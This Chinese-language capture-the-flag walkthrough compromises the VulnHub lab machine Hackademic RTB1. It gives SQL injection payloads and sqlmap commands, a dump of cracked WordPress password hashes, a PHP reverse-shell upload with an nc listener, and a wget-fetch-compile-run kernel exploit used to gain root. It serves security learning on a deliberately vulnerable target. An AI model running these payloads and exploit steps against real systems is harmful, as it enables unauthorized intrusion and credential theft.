0x01 下载地址

https://www.vulnhub.com/entry/hackademic-rtb1,17/

0x02 靶机目标

获取root目录下的key.txt

0x03 工具准备

• PHP反弹Shell脚本：https://github.com/pentestmonkey/php-reverse-shell

• MD5密码查询网站：https://md5.gromweb.com/

0x04 详细步骤

一、网络扫描

1. 内网IP发现

sudo arp-scan -I eth0 -l

发现目标靶机IP地址为192.168.17.130

2. 扫描开放端口

sudo nmap -p- 192.168.17.130

发现靶机开放22、80两个端口

3. 识别端口软件版本

sudo nmap -p22,80 -sV 192.168.17.130

二、Web信息收集

1. 浏览器打开http://192.168.17.130，发现target链接

2. 点击target，跳转到http://192.168.17.130/Hackademic_RTB1/

3. 点击Uncategorized，跳转到http://192.168.17.130/Hackademic_RTB1/?cat=1

三、SQL注入

1. 页面正常

http://192.168.17.130/Hackademic_RTB1/?cat=1 and 1=1

2. 页面报错，确认存在注入

http://192.168.17.130/Hackademic_RTB1/?cat=1 and 1=2

3. 判断数据库列数，判断存在5列

http://192.168.17.130/Hackademic_RTB1/?cat=1 and 1=1 order by 5 #页面正常
http://192.168.17.130/Hackademic_RTB1/?cat=1 and 1=1 order by 6 #页面报错

4. 确认数据回显位，确认2为回显位

http://192.168.17.130/Hackademic_RTB1/?cat=1 and 1=2 union select 1,2,3,4,5

5. 尝试注入查询数据库名称，数据库名称为wordpress

http://192.168.17.130/Hackademic_RTB1/?cat=1 and 1=2 union select 1,database(),3,4,5

6. 使用sqlmap自动化注入

• 注入查询数据库名

sqlmap -u "http://192.168.17.130/Hackademic_RTB1/?cat=1*" --dbs

• 注入查询表名

sqlmap -u "http://192.168.17.130/Hackademic_RTB1/?cat=1*" -D wordpress --tables

• 注入查询列名

sqlmap -u "http://192.168.17.130/Hackademic_RTB1/?cat=1*" -D wordpress -T wp_users --columns

• 注入查询数据

sqlmap -u "http://192.168.17.130/Hackademic_RTB1/?cat=1*" -D wordpress -T wp_users -C user_login,user_pass --dump

JohnSmith的MD5密码通过第三方网站（cmd5.com）查询得知明文为PUPPIES

最终获取密码表为：

+--------------+---------------------------------------------+
| user_login   | user_pass                                   |
+--------------+---------------------------------------------+
| NickJames    | 21232f297a57a5a743894a0e4a801fc3 (admin)    |
| MaxBucky     | 50484c19f1afdaf3841a0d821ed393d2 (kernel)   |
| GeorgeMiller | 7cbb3252ba6b7e9c422fac5334d22054 (q1w2e3)   |
| JasonKonnors | 8601f6e1028a8e8a966f6c33fcd9aec4 (maxwell)  |
| TonyBlack    | a6e514f9486b83cb53d8d932f9a04292 (napoleon) |
| JohnSmith    | b986448f0bb9e5e124ca91d3d650f52c (PUPPIES)  |
+--------------+---------------------------------------------+

四、Web目录扫描

• 扫描寻找后台登录地址

dirsearch -u http://192.168.17.130

并没有发现有用的信息

dirsearch -u http://192.168.17.130/Hackademic_RTB1

发现wp-admin目录是后台登录地址

• 浏览器打开http://192.168.17.130/Hackademic_RTB1/wp-admin/，发现后台登录页面

五、上传&GetShell

• 通过依次测试数据库的账号，发现GeorgeMiller：q1w2e3账号有应用系统设置权限

• 设置开启上传、允许php后缀

• 修改Shell反弹参数

• 上传WebShell

• 查看上传地址

• Kali主机nc监听反弹端口

nc -lnvp 5555

• 浏览器访问http://192.168.17.130//Hackademic_RTB1/wp-content/phpreverseshell.php，nc收到反弹shell

六、Linux本地提权

1. 尝试sudo提权，但没有权限

id
sudo -s

2. 尝试内核提权，查询内核版本号2.6.31.5

uname -a

3. 搜索利用代码

searchsploit 2.6.3

经测试15285.c可用

4. 编码执行代码

• Kali准备代码

cd /tmp
sudo cp /usr/share/exploitdb/exploits/linux/local/15285.c .
python3 -m http.server 80

• 靶机获取代码、编译、执行

cd /tmp
wget -c http://192.168.17.133/15285.c
gcc -o exp 15285.c
chmod +x exp
./exp
id

• 获取key.txt

cat /root/key.txt

本文版权归作者和微信公众号平台共有，重在学习交流，不以任何盈利为目的，欢迎转载。

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用，大部分文章来自各大安全社区，个人博客，如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览！！！

敲敲小黑板：《刑法》第二百八十五条　【非法侵入计算机信息系统罪；非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。违反国家规定，侵入前款规定以外的计算机信息系统或者采用其他技术手段，获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金；情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。

原文始发于微信公众号（巢安实验室）：HACKADEMIC: RTB1